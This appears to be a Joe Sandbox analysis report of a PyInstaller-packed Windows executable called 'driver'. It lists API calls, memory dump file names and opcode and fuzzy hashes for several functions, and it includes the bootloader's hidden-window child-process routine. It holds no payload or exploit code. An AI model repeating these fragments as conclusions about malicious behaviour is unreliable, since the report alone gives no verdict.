FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C58A9), ref: 00007FF6A29C59C7
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C58A9), ref: 00007FF6A29C59DD

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction ID: a5ad6016d22d8c926d8a180f1310a3abaaacf81444693b0821953df7218e71d6
Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction Fuzzy Hash: 8C11823265D60286FA544B12A45113EB7A0FB84F7AF500235EA9DC19D9EFACE014EB00

Function 00007FF6A29CABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC36
GetLastError.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC40

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 6cbaf254e8af50c7a1a333f7f4cc45dd2f85b16513f45232177e9ebc722cf1ae
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 9321C921F9E64246FAD45B63D4943B912926F84FA8F084239D91EC73C3DEECF4456301

Function 00007FF6A29CBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBF44

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 8d5985ee5f3c6c11994a77b79460bb9d5ea420ea99a8f76aaea311e4cf2306d2
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 9D41C232A4A2018BEA34DB17A55027D77A5EB55F98F140131EA8EC3792CFADF402EB51

Function 00007FF6A29B7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6A29B802A

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 33730839a158f4d8ce7f6d64c79b0ad0b4ea6e31d0dc51adf97bd487b526a0a8
Instruction ID: d8e74b0e728e09b6aa21c61caea39c79d4c6d026dae64044f200c5f44ffd8338
Opcode Fuzzy Hash: 33730839a158f4d8ce7f6d64c79b0ad0b4ea6e31d0dc51adf97bd487b526a0a8
Instruction Fuzzy Hash: 3221A321B8A65289FA149A1369043FA9651BF49FCCF8C5430EE4D87787CEBDE042A601

Function 00007FF6A29CB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBA32

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 0ca300ebdfacd212c790755f9d8e081d95734f5266d70d90ba69dbed48f93e67
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 8531AE22A5A64289F7515B57885137C36A1AF40F9CF520135E96D833D3CFFCF851A721

Function 00007FF6A29C6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C5F69

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: b19c2d8bec1afd658c8699d7ed7b117ee2b773e9c62324a95e810f2c97f1e2d9
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: DD119322A5E6418AFA649F13D4102BEA260EF45F88F444031EB4CE7A97DFBCF400A700

Function 00007FF8A8656940 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86569A0

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID:
API String ID: 22509725-0
Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction ID: 4fee6067973c69008c46eb7172d869e3b2da081929ae1f8118b2a32f1a9f67cd
Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
Instruction Fuzzy Hash: A4116D61B0A68250FE999716A2482BD9351DF55FC4F087431EE4D0BB99EF2CE4828718

Function 00007FF6A29D63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D63E7

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 829dfdb0357ff83dc32e141c7a0253004ebbd566023a4ded59427df2187ccbc8
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 3821C97265964187DB658F19E44037977E1FB84F98F144234EA9DC76DADF7CE400AB00

Function 00007FF8A809F070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A809F1C3

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction ID: a6271ce883cda26fb0747ab49f08933e70a316b8d31ca59849d19c59f1ef590d
Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction Fuzzy Hash: EF21A132E0EB42AAEF649E35EC4137932A0EF01BD4F284435DA4C422D5DF38E861C769

Function 00007FF6A29C042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C0480

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 069820f5a8b75d1a2d4c780924124f5d940fe3188c43fd58548f20eb99e46ba7
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 4401D621B4974145EA04DF53990117AA691BF85FE8F084631EE5C97FD7DEBCF111A300

Function 00007FF6A29B9070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

LoadLibraryExW.KERNEL32(?,00007FF6A29B6466,?,00007FF6A29B336E), ref: 00007FF6A29B9092

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction ID: 5b6063f5f9633e6a0d3caa7010ccbbf646bb2138d4d777322552c5e59e539422
Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction Fuzzy Hash: 7DD0C211F2525541FA54A767BA566395252AFCDFC8F88D035EE0D43B4BDC3CD0415B00

Function 00007FF8A804EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FF8A804EE5D), ref: 00007FF8A804EF61

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction ID: 0d644cd7f9f95d056b74ab2916b88c0a13ce35d8bfa767f9a68106b0ca8b5077
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: AD21A132B08B8096E7549B22A94076AB2A5FB88BD4F144035EB8C03F95CF3CD461CB08

Function 00007FF8A8041DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A809F1C3

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction ID: 63eb741c2fb799a1407de97bf5e798fb81dadf24601fa056e6a752ebde911925
Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction Fuzzy Hash: 57216D32E0AA42AAFF64AA35EC412793290EF41BD4F288430D94D466D5DF3CE861C779

Function 00007FF8A804204A Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A804F39B

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction ID: 4039647d9d5c0d3b0e8204c750f2449c12030089b9c7bd8ee6282cdd03732e82
Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction Fuzzy Hash: F5F04F22B49B8185E7009B26F8012AAA364FB95FC0F588035EE8D07BA9CF3CD5618718

Function 00007FF6A29CD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6A29C0D00,?,?,?,00007FF6A29C236A,?,?,?,?,?,00007FF6A29C3B59), ref: 00007FF6A29CD6AA

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 8ab37ece2347d4b0b77f19b99d37de510f9f04e0c0dd54ef45faa92d2e629520
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 36F05800B8B74659FE647B635A112B952904F94FA8F081230DC2EC63C3DEACF4A0F620

Non-executed Functions

Function 00007FF6A29B8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8C46

Part of subcall function 00007FF6A29CA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CA500

Part of subcall function 00007FF6A29C878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8CD6
CreateProcessW.KERNEL32 ref: 00007FF6A29B8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8D18

Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99

RegisterClassW.USER32 ref: 00007FF6A29B8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8D7B
CreateWindowExW.USER32 ref: 00007FF6A29B8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E05
PeekMessageW.USER32 ref: 00007FF6A29B8E29
TranslateMessage.USER32 ref: 00007FF6A29B8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E41
PeekMessageW.USER32 ref: 00007FF6A29B8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF6A29B9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B901F

Strings

Failed to create child process!, xrefs: 00007FF6A29B8D20
CreateProcessW, xrefs: 00007FF6A29B8D27
PyInstallerOnefileHiddenWindow, xrefs: 00007FF6A29B8D44
PyInstaller Onefile Hidden Window, xrefs: 00007FF6A29B8D85

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: b0b0528cd220ea9c628e33689c8daac0aa9a44b99a1d1e5dd53f71b0a2577bba
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
